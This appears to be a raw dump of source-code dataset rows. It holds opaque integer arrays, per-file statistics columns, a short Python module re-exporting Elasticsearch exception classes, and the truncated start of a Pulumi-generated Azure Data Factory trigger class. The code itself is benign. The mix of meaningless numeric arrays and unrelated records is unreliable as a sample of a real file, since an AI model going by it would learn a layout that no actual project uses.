[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 52240, 19332, 21057, 62950, 37638, 0, 0, 0, 0, 0, 0, 16384, 53248, 62464, 40192, 61248, 53712, 10996, 62621, 32350],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 37904, 45700, 26945, 25318, 4102, 0, 0, 0, 0, 0, 32768, 57344, 47104, 11776, 48000, 62176, 33720, 35886, 64441],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 23568, 6532, 32833, 53222, 36102, 0, 0, 0, 0, 49152, 12288, 52224, 21248, 3264, 3376, 1228, 24915, 28912],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 9232, 32900, 38721, 15590, 2566, 0, 0, 0, 0, 49152, 28672, 39936, 34560, 27072, 34928, 20636, 27187],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 60432, 59268, 44609, 43494, 34566, 0, 0, 16384, 36864, 58368, 55552, 40512, 17808, 1508, 46553, 54130],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 46096, 20100, 50497, 5862, 1030, 0, 32768, 40960, 26624, 6656, 54912, 57760, 5480, 44314, 58205],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 31760, 46468, 56385, 33766, 33030, 49152, 61440, 15360, 44800, 960, 54000, 50236, 42927, 8804],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 17424, 7300, 62273, 61670, 65030, 32768, 40960, 10240, 35328, 37504, 63648, 58664, 48567],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 3088, 33668, 2625, 40422, 51974, 54272, 21760, 40256, 19792, 42452, 41045, 5702],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 54288, 60036, 41281, 10982, 4102, 17920, 33152, 62560, 4120, 70, 15297],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 39952, 4484, 59457, 58342, 49158, 51904, 36016, 24748, 7499, 50072],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 25616, 63620, 8001, 39142, 36614, 48960, 51664, 43508, 11259],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 15376, 58244, 30529, 65062, 6166, 31428, 4113, 47834],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 49408, 43072, 48144, 14468, 14785, 27142, 36814, 4530, 35045],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 17408, 45312, 29760, 58128, 20292, 36529, 46594, 42797, 10380],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 17424, 1156, 22337, 9190, 65285]]
| 836.891051 | 844 | 0.388193 | 65,537 | 215,081 | 1.273983 | 0.037368 | 1.445606 | 2.150803 | 2.844358 | 0.864228 | 0.863941 | 0.86327 | 0.862707 | 0.861988 | 0.860994 | 0 | 0.558281 | 0.304713 | 215,081 | 256 | 845 | 840.160156 | 0.00004 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 13 |
7fe2006099f68deab5c2e110e42a39c2f5e0cfa5 | 272 | py | Python | elasticlog/exceptions.py | gustavohenrique/elasticlog | 4fc2fc40a886685a35a47b11566f227cc05d36c2 | [
"MIT"
] | 1 | 2017-05-06T19:33:08.000Z | 2017-05-06T19:33:08.000Z | elasticlog/exceptions.py | gustavohenrique/elasticlog | 4fc2fc40a886685a35a47b11566f227cc05d36c2 | [
"MIT"
] | 1 | 2021-06-01T21:44:34.000Z | 2021-06-01T21:44:34.000Z | elasticlog/exceptions.py | gustavohenrique/elasticlog | 4fc2fc40a886685a35a47b11566f227cc05d36c2 | [
"MIT"
] | null | null | null | # coding: utf-8
from elasticsearch.exceptions import ConnectionError
from elasticsearch.exceptions import ConnectionTimeout
from elasticsearch.exceptions import TransportError
from elasticsearch.exceptions import NotFoundError
from urllib3.exceptions import ProtocolError
| 38.857143 | 54 | 0.886029 | 28 | 272 | 8.607143 | 0.464286 | 0.33195 | 0.448133 | 0.547718 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008032 | 0.084559 | 272 | 6 | 55 | 45.333333 | 0.959839 | 0.047794 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
7ff198c6ab244cfbd57eed575eb27a1da860048f | 26,290 | py | Python | sdk/python/pulumi_azure/datafactory/trigger_tumbling_window.py | ScriptBox99/pulumi-azure | 1b8c6d5479ccabc39094741eac25a8ca44c8833a | [
"ECL-2.0",
"Apache-2.0"
] | 109 | 2018-06-18T00:19:44.000Z | 2022-02-20T05:32:57.000Z | sdk/python/pulumi_azure/datafactory/trigger_tumbling_window.py | ScriptBox99/pulumi-azure | 1b8c6d5479ccabc39094741eac25a8ca44c8833a | [
"ECL-2.0",
"Apache-2.0"
] | 663 | 2018-06-18T21:08:46.000Z | 2022-03-31T20:10:11.000Z | sdk/python/pulumi_azure/datafactory/trigger_tumbling_window.py | ScriptBox99/pulumi-azure | 1b8c6d5479ccabc39094741eac25a8ca44c8833a | [
"ECL-2.0",
"Apache-2.0"
] | 41 | 2018-07-19T22:37:38.000Z | 2022-03-14T10:56:26.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['TriggerTumblingWindowArgs', 'TriggerTumblingWindow']
@pulumi.input_type
class TriggerTumblingWindowArgs:
def __init__(__self__, *,
data_factory_id: pulumi.Input[str],
frequency: pulumi.Input[str],
interval: pulumi.Input[int],
pipeline: pulumi.Input['TriggerTumblingWindowPipelineArgs'],
start_time: pulumi.Input[str],
activated: Optional[pulumi.Input[bool]] = None,
additional_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
annotations: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
delay: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
end_time: Optional[pulumi.Input[str]] = None,
max_concurrency: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
retry: Optional[pulumi.Input['TriggerTumblingWindowRetryArgs']] = None,
trigger_dependencies: Optional[pulumi.Input[Sequence[pulumi.Input['TriggerTumblingWindowTriggerDependencyArgs']]]] = None):
"""
The set of arguments for constructing a TriggerTumblingWindow resource.
"""
pulumi.set(__self__, "data_factory_id", data_factory_id)
pulumi.set(__self__, "frequency", frequency)
pulumi.set(__self__, "interval", interval)
pulumi.set(__self__, "pipeline", pipeline)
